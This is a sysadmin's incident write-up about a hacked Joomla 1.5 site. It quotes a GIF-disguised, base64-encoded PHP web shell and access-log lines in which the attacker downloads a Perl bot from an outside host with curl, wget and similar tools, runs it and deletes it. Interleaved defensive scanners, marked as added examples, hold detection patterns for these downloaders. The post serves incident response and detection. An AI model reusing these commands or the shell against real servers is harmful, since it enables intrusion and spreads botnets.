Uploaded and executed perl script through old Joomla vulnerability


Published on February 10th 2014 - Listed in Hacks Linux Internet


Being a Linux admin running multiple web servers inevitably puts me in the game of hackers vs. systems. It's an endless game without any winners.

“How art thou out of breath when thou hast breath To say to me that thou art out of breath?”
- William Shakespeare

That's definitely a quote which fits such situations. I also have to say that in the past, 99% of all hacks I've had to handle were caused by old and unpatched public Content Management Systems, especially old Joomla installations. While the end user (who's actually responsible for installing and maintaining the application) mostly doesn't give a damn about updates, it's the sysadmin who ends up doing the work.

I noticed this particular hack a few weeks ago when I received an alert about a web server's load. I also checked the network traffic, and the graphs confirmed a clear anomaly:

[Graphs: CPU load and network traffic]

After a few minutes I found the website that was being attacked (thanks to Apache's server-status and lsof), along with several recently modified/uploaded files in one of the website's subfolders, placed there through the CMS:

ls -ltr | tail
-rw-r--r-- 1 www-data www-data  182880 Mar  9  2013 red_power.jpg
-rw-r--r-- 1 www-data www-data  299881 Mar  9  2013 strandstrukturen.jpg
-rw-r--r-- 1 www-data www-data  185763 Mar  9  2013 nuts_verflssigt.jpg
-rw-r--r-- 1 www-data www-data    1515 Dec 14 22:12 localhost.php
-rw-r--r-- 1 www-data www-data    1515 Dec 14 22:12 iam.gif
-rw-r--r-- 1 www-data www-data    1520 Dec 19 20:08 bkht.gif
-rw-r--r-- 1 www-data www-data    1635 Jan 20 10:29 viar.gif
-rw-r--r-- 1 www-data www-data  207194 Jan 29 03:35 v.php
-rw-r--r-- 1 www-data www-data    1521 Jan 29 07:07 food.php
-rw-r--r-- 1 www-data www-data    1521 Jan 29 07:07 food.gif

Let's take a look at food.gif - which is supposed to be a binary file by the way:

cat food.gif
GIF89aGlobex
[...]

Yeah, that's what I actually expected to find. It's a "fake" GIF which merely starts with the GIF header. But because the web server doesn't execute PHP code from a file without a .php extension, this one won't harm the system much. More interesting is food.php, which looks like this:

cat food.php
GIF89aGlobex
JQdLfz1WnQgp84AySJACaggwfY1YlSSWgy6lx68TbSqLIhFMUOARF3JyiEyUrFgN+3koTo67NC0yuqmNqmTBSm0Xh5KHJK/s+z3YahDZsWq4iZROg3mIosoNLxNyrN1elpikTt6Ug9X8QgmjMpdWU85sznkZHbR+Sc2MdBkTNU3tsGIYWcC/SeN54iutZn5j0V5SZMXm1vuArINLi495Ou/3v9VsBJvjAyV2nnXdNcmGgwNM6+jYLLloBWLQu7ZekbEbzzk3C7ayHhnHWl+uzsBBy+J1fHc44PR1FWkh4waOYbyGEu8O7KyRncNPPrDYUnRMjAb+iy6mKHDnBltqiSawdncwPyQUSev2VTMVY1CyDPfCE2TLmHnooypamdbEgCj4Mhwsr4MzTw/Jkz16z1Wuh75uGc6IpaxJFpm9teq1SSq2Pk6/NhO0Yj+wrDXu+Zh9c6mPkexJZlDUTl+6sU0279JvBU7WGEmK74UgvwmDmjQQ1AQAYLNve7OAN9wsGi6aoANfa5/wdqUSPOT2XmE3AMFm/a8E+Q7UXq7JXp5rLwL/Dw==')))); ?>

The content of food.php is actually the same as food.gif. As hackers often do, they encoded the whole PHP source code. Decoding it reveals the following source code:
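The two indicators above (an image-named file that contains PHP, and a .php file that opens with a GIF header) can be checked automatically across an upload directory. The following scanner is an added example written for this post, not the author's code or part of Joomla; the sample files it builds in a temporary directory are constructed stand-ins for the listing above (the payload string is a placeholder, not the real shell).

```python
import os, re, shutil, tempfile

# Heuristics taken from the post: an image-named file that contains PHP, a .php
# file disguised with a GIF header, and PHP that hides its body behind eval().
IMAGE_EXTS = {".gif", ".jpg", ".jpeg", ".png"}
PHP_TAG = re.compile(rb"<\?php\b|<\?=", re.IGNORECASE)
OBFUSCATED = re.compile(
    rb"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", re.IGNORECASE)

def classify(path):
    """Return the reasons this file looks like a dropped web shell (empty list if clean)."""
    with open(path, "rb") as fh:
        head = fh.read(65536)  # the header and a small shell fit in the first 64 KiB
    ext = os.path.splitext(path)[1].lower()
    reasons = []
    if ext in IMAGE_EXTS and PHP_TAG.search(head):
        reasons.append("image extension but contains a PHP open tag")
    if ext == ".php" and head.startswith(b"GIF89a"):
        reasons.append("PHP file disguised with a GIF header")
    if OBFUSCATED.search(head):
        reasons.append("eval() over a decoded payload")
    return reasons

def scan_upload_dir(root):
    """Walk an upload directory and return {path relative to root: reasons} for suspicious files."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            reasons = classify(full)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings

def demo():
    """Build a constructed sample tree modelled on the post's listing, scan it, and clean up."""
    root = tempfile.mkdtemp()
    shell = b"GIF89aGlobex\n<?php eval(base64_decode('QUJD')); ?>"  # constructed stand-in
    samples = {"red_power.jpg": b"\xff\xd8\xff\xe0JFIF", "food.gif": shell,
               "food.php": shell, "index.html": b"<html></html>"}
    try:
        for name, content in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(content)
        return scan_upload_dir(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)
```

Point scan_upload_dir() at a real images/stories directory to get the same dictionary for live files; a .gif that contains PHP is still worth removing even if the server will not execute it, because a later misconfiguration or a second include-style bug can change that.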

[Screenshot: decoded source code of the PHP upload form]

Well this does look like a small PHP shell script. Let's look at it in the browser:

[Screenshot: the small PHP upload form in the browser]

Cute :-).
The steps that followed are what caused the huge load.
The hacker did not simply execute some commands. No. The hacker used this form to download a remote Perl script and then execute it:

27.111.90.4 - - [29/Jan/2014:07:07:51 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:07:51 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 200 50 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:07:55 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:07:54 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 200 50 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:08:08 +0100] "GET /images/stories/food.php?rf HTTP/1.1" 200 2455 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:10 +0100] "GET /images/stories/food.php?cmd=curl+-C+-+-O+http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:11 +0100] "GET /images/stories/food.php?cmd=wget++http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:12 +0100] "GET /images/stories/food.php?cmd=fetch++http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:13 +0100] "GET /images/stories/food.php?cmd=lwp-download++http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
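The access log above carries three things worth alerting on: POSTs to the JCE image manager (with the telltale "BOT for JCE" user agent), a .php file being requested from the images upload directory, and a cmd parameter that chains a downloader with perl. The following detector is an added example, not the author's tooling; it parses Apache combined-format lines and tags each of these, and the SAMPLE_LOG lines are constructed after the excerpt above with a placeholder client IP and download host.

```python
import re
from urllib.parse import urlsplit, parse_qs

LOG_RE = re.compile(  # Apache combined log; only the fields used below are captured
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
DOWNLOADER = re.compile(r"\b(curl|wget|fetch|lwp-download)\b")
INTERPRETER = re.compile(r";\s*(perl|python|php|sh|bash)\b")

def classify_request(line):
    """Return alert tags for one access-log line (empty list if nothing suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    query = parse_qs(parts.query, keep_blank_values=True)
    tags = []
    # 1. Calls to the JCE image manager, the upload path used in this incident.
    if parts.path.endswith("/index.php") and query.get("option") == ["com_jce"] \
            and query.get("plugin") == ["imgmanager"]:
        tags.append("jce-imgmanager")
        if "BOT for JCE" in m.group("ua"):
            tags.append("jce-bot-user-agent")
    # 2. A PHP script served from an image upload directory: there should be none.
    if parts.path.startswith("/images/") and parts.path.lower().endswith(".php"):
        tags.append("php-in-images")
        if "cmd" in query:
            tags.append("webshell-cmd")
            cmd = query["cmd"][0]  # parse_qs already decoded '+' and %3B
            if DOWNLOADER.search(cmd) and INTERPRETER.search(cmd):
                tags.append("download-and-execute")
    return tags

def scan_log(lines):
    """Return (ip, timestamp, tags) for every flagged line in an access log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        tags = classify_request(line)
        if m and tags:
            hits.append((m.group("ip"), m.group("ts"), tags))
    return hits

# Constructed sample lines modelled on the post's excerpt; IP and download host are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jan/2014:07:07:51 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)"',
    '192.0.2.10 - - [29/Jan/2014:07:08:08 +0100] "GET /images/stories/food.php?rf HTTP/1.1" 200 2455 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [29/Jan/2014:07:08:10 +0100] "GET /images/stories/food.php?cmd=curl+-C+-+-O+http://example.invalid/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Jan/2014:07:09:00 +0100] "GET /images/stories/red_power.jpg HTTP/1.1" 200 182880 "-" "Mozilla/5.0"',
]
```

Feed scan_log() the lines of a real access.log to get the same tuples; the "php-in-images" tag alone is enough to justify a look, since a correctly configured Joomla site never serves PHP from images/.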

I manually accessed the URL the Perl bot was downloaded from, and this is what the bot script looked like:

[Screenshot: the Perl bot script]

On the system, several hundred processes called "/usr/sbin/httpd" had been launched (the process name was obviously faked); these were running the Perl bot. Each instance of the bot attacked several websites on the Internet, trying to do exactly the same thing again: find the Joomla vulnerability and hack the website.
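A script can rewrite the name ps shows, but it cannot change which binary /proc/<pid>/exe points at, so a process that calls itself /usr/sbin/httpd while its exe is perl stands out. The following check is an added example written for this post (not the author's tooling); it assumes a Linux /proc and needs root to read the exe link of other users' processes such as www-data.

```python
import os

# Interpreters a dropped script typically runs under; a process whose real binary is
# one of these but whose ps name claims to be a daemon is the pattern from the post.
INTERPRETERS = {"perl", "python", "python2", "python3", "php", "ruby", "sh", "bash"}

def looks_spoofed(argv0, exe_path):
    """True when the name shown in ps (argv0) does not match the binary behind /proc/<pid>/exe."""
    shown = os.path.basename(argv0).lstrip("-")  # "-bash" is a login shell, not a spoof
    real = os.path.basename(exe_path).replace(" (deleted)", "")
    return shown != real and real in INTERPRETERS

def scan_proc(proc="/proc"):
    """Walk /proc and return [(pid, argv0, exe)] for processes with a spoofed name.

    Legitimate Perl daemons also rewrite $0, so treat the result as a triage list,
    not a verdict. Processes that exited or belong to other users are skipped.
    """
    hits = []
    if not os.path.isdir(proc):
        return hits
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc, entry, "cmdline"), "rb") as fh:
                argv0 = fh.read().split(b"\0")[0].decode(errors="replace")
            exe = os.readlink(os.path.join(proc, entry, "exe"))
        except OSError:
            continue  # process exited, or exe is unreadable without root
        if argv0 and looks_spoofed(argv0, exe):
            hits.append((int(entry), argv0, exe))
    return hits

if __name__ == "__main__":
    for pid, argv0, exe in scan_proc():
        print(f"pid {pid}: ps shows {argv0!r} but the binary is {exe}")
```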

Once I disabled the hacked site, things calmed down again. And once again, the responsible website was running this:

        var $RELEASE    = '1.5';
        /** @var string Development Status */
        var $DEV_STATUS = 'Stable';
        /** @var int Sub Release Level */
        var $DEV_LEVEL  = '15';
        /** @var int build Number */
        var $BUILD      = '';
        /** @var string Codename */
        var $CODENAME   = 'Wojmamni Ama Mamni';
        /** @var string Date */
        var $RELDATE    = '05-November-2009';

Honestly, I can't blame the hackers. There are so many pseudo-webmasters out there who install a CMS once and then never take care of it again; it's just too easy to hack these sites.

